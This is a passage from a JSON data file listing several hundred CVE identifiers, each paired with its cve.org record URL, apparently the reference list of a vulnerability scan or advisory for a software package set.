"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2024-54458",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54458"
},
{
"name": "CVE-2022-44267",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44267"
},
{
"name": "CVE-2024-26141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26141"
},
{
"name": "CVE-2015-4783",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4783"
},
{
"name": "CVE-2019-8321",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8321"
},
{
"name": "CVE-2025-21826",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21826"
},
{
"name": "CVE-2025-29768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29768"
},
{
"name": "CVE-2015-4774",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4774"
},
{
"name": "CVE-2023-50495",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
},
{
"name": "CVE-2022-23772",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23772"
},
{
"name": "CVE-2022-21294",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21294"
},
{
"name": "CVE-2025-21750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21750"
},
{
"name": "CVE-2017-11164",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11164"
},
{
"name": "CVE-2024-57924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57924"
},
{
"name": "CVE-2025-21912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21912"
},
{
"name": "CVE-2018-13440",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13440"
},
{
"name": "CVE-2022-42898",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42898"
},
{
"name": "CVE-2025-46393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46393"
},
{
"name": "CVE-2022-43551",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43551"
},
{
"name": "CVE-2021-0561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0561"
},
{
"name": "CVE-2018-12599",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12599"
},
{
"name": "CVE-2025-21859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21859"
},
{
"name": "CVE-2025-38416",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38416"
},
{
"name": "CVE-2022-1587",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1587"
},
{
"name": "CVE-2025-21825",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21825"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2017-7246",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7246"
},
{
"name": "CVE-2020-2755",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2755"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2023-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27533"
},
{
"name": "CVE-2022-0284",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0284"
},
{
"name": "CVE-2017-7500",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7500"
},
{
"name": "CVE-2025-9086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
},
{
"name": "CVE-2025-49124",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49124"
},
{
"name": "CVE-2023-6481",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6481"
},
{
"name": "CVE-2024-58016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58016"
},
{
"name": "CVE-2020-14779",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14779"
},
{
"name": "CVE-2025-21903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21903"
},
{
"name": "CVE-2021-41772",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41772"
},
{
"name": "CVE-2021-32292",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32292"
},
{
"name": "CVE-2025-38194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38194"
},
{
"name": "CVE-2024-0727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
},
{
"name": "CVE-2023-6378",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6378"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2022-34903",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34903"
},
{
"name": "CVE-2023-1667",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1667"
},
{
"name": "CVE-2022-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2953"
},
{
"name": "CVE-2022-43238",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43238"
},
{
"name": "CVE-2025-3121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3121"
},
{
"name": "CVE-2022-4899",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4899"
},
{
"name": "CVE-2022-43680",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43680"
},
{
"name": "CVE-2025-21956",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21956"
},
{
"name": "CVE-2024-20696",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20696"
},
{
"name": "CVE-2025-21761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21761"
},
{
"name": "CVE-2025-46149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46149"
},
{
"name": "CVE-2021-26945",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26945"
},
{
"name": "CVE-2025-37932",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37932"
},
{
"name": "CVE-2022-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
},
{
"name": "CVE-2025-46152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46152"
},
{
"name": "CVE-2025-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37890"
},
{
"name": "CVE-2024-57951",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57951"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2022-34169",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34169"
},
{
"name": "CVE-2025-38348",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38348"
},
{
"name": "CVE-2023-34969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34969"
},
{
"name": "CVE-2025-21844",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21844"
},
{
"name": "CVE-2025-21885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21885"
},
{
"name": "CVE-2020-22916",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-22916"
},
{
"name": "CVE-2025-21784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21784"
},
{
"name": "CVE-2025-31672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31672"
},
{
"name": "CVE-2025-21681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21681"
},
{
"name": "CVE-2023-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22045"
},
{
"name": "CVE-2025-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38540"
},
{
"name": "CVE-2025-5916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
},
{
"name": "CVE-2025-21676",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21676"
},
{
"name": "CVE-2025-30721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30721"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2022-28463",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28463"
},
{
"name": "CVE-2022-23308",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23308"
},
{
"name": "CVE-2025-21726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21726"
},
{
"name": "CVE-2023-29400",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29400"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2018-3779",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-3779"
},
{
"name": "CVE-2024-21138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21138"
},
{
"name": "CVE-2020-28196",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28196"
},
{
"name": "CVE-2024-27407",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27407"
},
{
"name": "CVE-2025-41232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41232"
},
{
"name": "CVE-2024-58020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58020"
},
{
"name": "CVE-2025-50091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50091"
},
{
"name": "CVE-2025-10911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10911"
},
{
"name": "CVE-2025-32988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32988"
},
{
"name": "CVE-2021-31566",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31566"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2022-28805",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28805"
},
{
"name": "CVE-2024-26461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26461"
},
{
"name": "CVE-2024-34750",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34750"
},
{
"name": "CVE-2021-29923",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29923"
},
{
"name": "CVE-2017-3604",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3604"
},
{
"name": "CVE-2025-21723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21723"
},
{
"name": "CVE-2023-0804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0804"
},
{
"name": "CVE-2023-22049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22049"
},
{
"name": "CVE-2024-24787",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24787"
},
{
"name": "CVE-2025-21802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21802"
},
{
"name": "CVE-2022-21341",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21341"
},
{
"name": "CVE-2025-38146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38146"
},
{
"name": "CVE-2025-21705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21705"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2023-27538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27538"
},
{
"name": "CVE-2022-1355",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1355"
},
{
"name": "CVE-2025-47291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47291"
},
{
"name": "CVE-2023-4641",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4641"
},
{
"name": "CVE-2025-27113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2023-36054",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36054"
},
{
"name": "CVE-2024-26458",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26458"
},
{
"name": "CVE-2025-38418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38418"
},
{
"name": "CVE-2025-38090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38090"
},
{
"name": "CVE-2025-21721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21721"
},
{
"name": "CVE-2025-21810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21810"
},
{
"name": "CVE-2022-1420",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1420"
},
{
"name": "CVE-2022-23218",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23218"
},
{
"name": "CVE-2021-24031",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24031"
},
{
"name": "CVE-2025-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23166"
},
{
"name": "CVE-2022-41724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41724"
},
{
"name": "CVE-2025-46153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46153"
},
{
"name": "CVE-2025-21877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21877"
},
{
"name": "CVE-2023-0797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0797"
},
{
"name": "CVE-2025-5994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5994"
},
{
"name": "CVE-2021-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38115"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2021-31879",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2020-8908",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8908"
},
{
"name": "CVE-2024-49887",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49887"
},
{
"name": "CVE-2025-22134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22134"
},
{
"name": "CVE-2021-35578",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35578"
},
{
"name": "CVE-2025-1215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1215"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2021-20309",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20309"
},
{
"name": "CVE-2022-29217",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29217"
},
{
"name": "CVE-2024-0397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
},
{
"name": "CVE-2022-30634",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30634"
},
{
"name": "CVE-2023-38472",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38472"
},
{
"name": "CVE-2024-56826",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56826"
},
{
"name": "CVE-2017-12643",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12643"
},
{
"name": "CVE-2024-57953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57953"
},
{
"name": "CVE-2020-14583",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14583"
},
{
"name": "CVE-2025-24294",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24294"
},
{
"name": "CVE-2023-48232",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48232"
},
{
"name": "CVE-2021-26720",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26720"
},
{
"name": "CVE-2025-54801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54801"
},
{
"name": "CVE-2025-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40909"
},
{
"name": "CVE-2025-53054",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53054"
},
{
"name": "CVE-2025-21878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21878"
},
{
"name": "CVE-2023-24756",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24756"
},
{
"name": "CVE-2017-3607",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3607"
},
{
"name": "CVE-2021-44716",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44716"
},
{
"name": "CVE-2022-2520",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2520"
},
{
"name": "CVE-2022-21340",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21340"
},
{
"name": "CVE-2024-47874",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47874"
},
{
"name": "CVE-2025-21670",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21670"
},
{
"name": "CVE-2025-9403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9403"
},
{
"name": "CVE-2023-1255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1255"
},
{
"name": "CVE-2025-21739",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21739"
},
{
"name": "CVE-2016-4074",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4074"
},
{
"name": "CVE-2024-0746",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0746"
},
{
"name": "CVE-2025-21775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21775"
},
{
"name": "CVE-2024-12254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12254"
},
{
"name": "CVE-2025-21846",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21846"
},
{
"name": "CVE-2022-33099",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33099"
},
{
"name": "CVE-2023-45931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45931"
},
{
"name": "CVE-2025-8114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
},
{
"name": "CVE-2025-38400",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38400"
},
{
"name": "CVE-2023-6004",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6004"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2024-26775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26775"
},
{
"name": "CVE-2022-25309",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25309"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-38136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38136"
},
{
"name": "CVE-2024-38808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38808"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-12747",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12747"
},
{
"name": "CVE-2022-3358",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3358"
},
{
"name": "CVE-2023-41175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41175"
},
{
"name": "CVE-2023-48234",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48234"
},
{
"name": "CVE-2025-55212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55212"
},
{
"name": "CVE-2022-36087",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36087"
},
{
"name": "CVE-2022-32547",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32547"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2022-0351",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0351"
},
{
"name": "CVE-2022-35737",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35737"
},
{
"name": "CVE-2022-21293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21293"
},
{
"name": "CVE-2022-2097",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2097"
},
{
"name": "CVE-2022-26280",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26280"
},
{
"name": "CVE-2025-37752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37752"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2023-7008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7008"
},
{
"name": "CVE-2022-1354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1354"
},
{
"name": "CVE-2023-24540",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24540"
},
{
"name": "CVE-2025-21873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21873"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-38048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38048"
},
{
"name": "CVE-2019-13147",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13147"
},
{
"name": "CVE-2025-50104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50104"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-2800",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2800"
},
{
"name": "CVE-2024-8096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8096"
},
{
"name": "CVE-2018-11655",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11655"
},
{
"name": "CVE-2022-4415",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4415"
},
{
"name": "CVE-2022-2928",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2928"
},
{
"name": "CVE-2025-21765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21765"
},
{
"name": "CVE-2023-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3576"
},
{
"name": "CVE-2025-38477",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38477"
},
{
"name": "CVE-2023-4806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4806"
},
{
"name": "CVE-2025-61772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61772"
},
{
"name": "CVE-2025-57803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57803"
},
{
"name": "CVE-2023-46246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46246"
},
{
"name": "CVE-2025-21782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21782"
},
{
"name": "CVE-2023-31437",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31437"
},
{
"name": "CVE-2023-47039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47039"
},
{
"name": "CVE-2025-30722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30722"
},
{
"name": "CVE-2024-43802",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43802"
},
{
"name": "CVE-2025-38177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38177"
},
{
"name": "CVE-2016-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2781"
},
{
"name": "CVE-2023-31484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
},
{
"name": "CVE-2024-56827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56827"
},
{
"name": "CVE-2023-29383",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29383"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2022-32206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32206"
},
{
"name": "CVE-2023-37769",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37769"
},
{
"name": "CVE-2025-21926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21926"
},
{
"name": "CVE-2022-21282",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21282"
},
{
"name": "CVE-2022-21349",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21349"
},
{
"name": "CVE-2020-29511",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29511"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2015-7697",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7697"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-21742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21742"
},
{
"name": "CVE-2025-30687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30687"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2022-43243",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43243"
},
{
"name": "CVE-2024-58002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58002"
},
{
"name": "CVE-2017-16231",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-16231"
},
{
"name": "CVE-2025-38406",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38406"
},
{
"name": "CVE-2025-50101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50101"
},
{
"name": "CVE-2025-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21930"
},
{
"name": "CVE-2021-35942",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35942"
},
{
"name": "CVE-2025-46701",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46701"
},
{
"name": "CVE-2025-38001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38001"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-5702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5702"
},
{
"name": "CVE-2025-21870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21870"
},
{
"name": "CVE-2017-9409",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9409"
},
{
"name": "CVE-2023-24537",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24537"
},
{
"name": "CVE-2018-1000077",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000077"
},
{
"name": "CVE-2025-21892",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21892"
},
{
"name": "CVE-2024-58052",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58052"
},
{
"name": "CVE-2025-21944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21944"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2016-0689",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0689"
},
{
"name": "CVE-2025-38352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38352"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2024-54456",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54456"
},
{
"name": "CVE-2025-61748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61748"
},
{
"name": "CVE-2025-21920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21920"
},
{
"name": "CVE-2025-55554",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55554"
},
{
"name": "CVE-2024-43168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43168"
},
{
"name": "CVE-2014-8140",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8140"
},
{
"name": "CVE-2025-22235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
},
{
"name": "CVE-2025-22016",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22016"
},
{
"name": "CVE-2025-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4207"
},
{
"name": "CVE-2021-45346",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45346"
},
{
"name": "CVE-2025-37756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37756"
},
{
"name": "CVE-2022-0908",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0908"
},
{
"name": "CVE-2025-38263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38263"
},
{
"name": "CVE-2025-21667",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21667"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2024-46901",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46901"
},
{
"name": "CVE-2023-49083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49083"
},
{
"name": "CVE-2025-21955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21955"
},
{
"name": "CVE-2025-8677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8677"
},
{
"name": "CVE-2025-21773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21773"
},
{
"name": "CVE-2025-53040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53040"
},
{
"name": "CVE-2025-38218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38218"
},
{
"name": "CVE-2023-45287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45287"
},
{
"name": "CVE-2025-53906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2025-1352",
